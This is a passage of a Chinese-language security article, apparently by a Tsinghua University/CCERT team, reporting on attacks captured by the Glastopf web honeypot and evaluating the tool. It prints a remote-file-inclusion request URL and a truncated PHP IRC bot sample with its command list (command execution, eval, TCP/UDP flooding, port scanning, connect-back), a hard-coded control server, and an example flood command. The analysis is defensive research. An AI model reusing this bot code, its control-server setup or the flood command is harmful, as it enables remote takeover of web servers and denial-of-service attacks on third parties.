通过我们的注释可以看到，这段PHP脚本是一段可以执行输入shell命令并返回执行结果的Webshell。

　　另外一个捕获到的Web攻击请求URL为：http://XX.XX.cn:8080/glasif/showrfi.php?
　　url=http://sna.cl/ww/admin/spaw2/uploads/files/byroe.jpg??

　　打开捕获文件，如下所示：

　　<?
　　/*
　　* -JAVAHACK. since 2011
　　* REcoding by: JAVAHACK community
　　* COMMANDS:* .user <password> //login to the bot
　　* .logout //logout of the bot
　　* .die //kill the bot
　　* .restart //restart the bot
　　* .mail <to><from><subject><msg> //send an email
　　* .dns<IP|HOST> //dns lookup
　　* .download <URL><filename> //download a file
　　* .exec <cmd> // uses exec() //execute a command
　　* .sexec<cmd> // uses shell_exec() //execute a command
　　* .cmd<cmd> // uses popen() //execute a command
　　* .info //get system information
　　* .php<php code> // uses eval() //execute php code
　　* .tcpflood<target><packets><packetsize><port><delay> //tcpflood attack
　　* .udpflood<target><packets><packetsize><delay> //udpflood attack
　　* .raw <cmd> //raw IRC command* .rndnick //change nickname
　　* .pscan<host><port> //port scan
　　* .safe // test safe_mode (dvl)
　　* .inbox <to> // test inbox (dvl)
　　* .conback<ip><port> // conect back (dvl)
　　* .uname // return shell's uname using a php function (dvl)
　　*
　　/set_time_limit(0);
　　error_reporting(0);
　　echo "ok!";
　　class pBot
　　{
　　var $config = array("server"=>"jatimcrew.uk.to",
　　"port"=>"6667",
　　"pass"=>"",
　　"prefix"=>"peak",
　　"maxrand"=>"5",
　　"chan"=>"#asu",
　　"chan2"=>"#asu",
　　"key"=>"bot",
　　"modes"=>"+ps",
　　"password"=>"asu",
　　"trigger"=>".",
　　"hostauth"=>"*" // * for any hostname (remember: /setvhostracun.dunia)
　　);
　　var $users = array();
　　function start()
　　{
　　if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],
　　$e,$s,30)))
　　$this->start();
　　$ident = $this->config['prefix'];

　　………………………………………………………部分省略

　　从上面的代码可以看出，这是一个典型的PHP僵尸程序，该僵尸程序运行后，通过口令和密码进行连接到jatimcrew.uk.to所在的服务器6667端口，接受服务器控制。该程序能够进行DNS查询、系统信息查询、远程重启、远程运行文件等多种命令，还可以运行一些高级的远程IRC命令、远程扫描端口，进行TCP或者UDP泛洪攻击，如果僵尸主机组足够多的话，完全能够实施一次分布式拒绝服务（DDOS）攻击。在这个程序中，通过.tcpflood 192.0.2.0 1000 10080 1 命令就可以让僵尸主机以每秒1000数据包（包长为100）的速率向192.0.2.0主机的80端口发起攻击。

　　Glastopf是一款在开源社区非常不错的低交互式Web应用蜜罐软件，由于代码全部使用Python编写，能够在各种主流操作系统平台上进行广泛部署，同时它的安装和配置过程相对简单，方便研究者和安全兴趣爱好者使用。通过我们在清华大学网络中心网络与信息安全实验室近三个多月的运行，我们发现它的稳定性也很好，共捕获到各种恶意攻击文件400多个，攻击4000多次，同时在Dorklist中更新了大量Web应用攻击点。整体来说，Glastopf能够基本完成Web应用蜜罐的功能。

　　值得指出的是，Glastopf蜜罐还有很大的改进空间，特别是在与攻击者交互（模拟真实系统）、记录更多的攻击数据（XSS、SQL注入等）、分析捕获数据等方面。目前这些功能在GlastopfNG中正在积极开发，如果这些功能能够完整地添加到GlastopfNG中去，那么将使得该蜜罐成为一款功能更为强大的Web应用蜜罐。

　　读者如果对Glastopf感兴趣进行部署，或者想增加其中的某些功能，进行模块编写，都可以联系本文作者或联系蜜罐作者Lukas Rist。需要特别指出的是，Lukas在开源社区的工作非常活跃，今年以来又编写发布了用来分析捕获的恶意文件样本的PHP Sandbox，以及用来捕获Webshell的PHPShell Honeypot等非常有意义的工具，感兴趣的读者可以参考http://dev.glastopf.org/网站，积极参与到开源项目中。

　　（清华大学计算机科学与技术系、清华大学网络中心、CCERT 应急响应组）